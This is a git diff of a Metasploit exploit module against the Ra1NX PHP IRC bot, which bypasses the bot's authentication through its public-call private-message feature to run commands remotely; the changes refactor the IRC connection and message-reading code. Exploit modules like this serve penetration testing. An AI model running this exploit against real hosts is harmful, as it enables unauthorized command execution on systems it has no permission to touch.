diff --git a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb index f39c1b3c51..73b1fa7c0a 100644 --- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb +++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => '"Ra1NX" PHP Bot PubCall Authentication Bypass Remote Code Execution', + 'Name' => 'Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution', 'Description' => %q{ - This module allows remote command execution on the PHP IRC bot Ra1NX by + This module allows remote command execution on the PHP IRC bot Ra1NX by using the public call feature in private message to covertly bypass the authentication system. }, @@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ + ['OSVDB', '91663'], ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'], ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'], ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b'] @@ -40,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => true, 'Compat' => { - 'PayloadType' => 'cmd', + 'PayloadType' => 'cmd' } }, 'Targets' => @@ -62,16 +63,38 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def check + def connect_irc + print_status("#{rhost}:#{rport} - Connecting to IRC server...") connect + data = "" + begin + read_data = sock.get_once(-1, 1) + while not read_data.nil? + data << read_data + read_data = sock.get_once(-1, 1) + end + rescue EOFError + end + + if data and data =~ /020.*wait/ + print_status("#{rhost}:#{rport} - Connection successful, giving 3 seconds to IRC server to process our connection...") + select(nil, nil, nil, 3) + end + end + + def check + connect_irc + response = register(sock) if response =~ /463/ or response =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end + confirm_string = rand_text_alpha(8) - response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n", ":#{datastore['RNICK']}") + response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n") + quit(sock) disconnect @@ -82,22 +105,15 @@ class Metasploit3 < Msf::Exploit::Remote end end - def send_msg(sock, data, startResponse = nil) + def send_msg(sock, data) sock.put(data) data = "" - count = 3 begin - begin + read_data = sock.get_once(-1, 1) + while not read_data.nil? + data << read_data read_data = sock.get_once(-1, 1) - while not read_data.nil? - data << read_data - read_data = sock.get_once(-1, 1) - end - if startResponse != nil and data.start_with?(startResponse) - startResponse = nil - end - count -= 1 - end while startResponse == nil and count != 0 + end rescue EOFError end data @@ -137,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - connect + connect_irc print_status("#{rhost}:#{rport} - Registering with the IRC Server...") response = register(sock)